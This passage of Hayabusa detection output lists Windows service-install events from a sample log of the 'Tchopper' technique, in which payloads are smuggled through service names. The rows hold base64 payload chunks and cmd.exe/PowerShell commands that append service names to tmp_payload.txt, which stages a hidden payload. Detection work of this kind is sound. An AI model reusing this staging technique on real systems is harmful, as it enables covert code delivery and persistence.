deployed via service - Tchopper.evtx" +2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:12.786 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:22.542 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append 
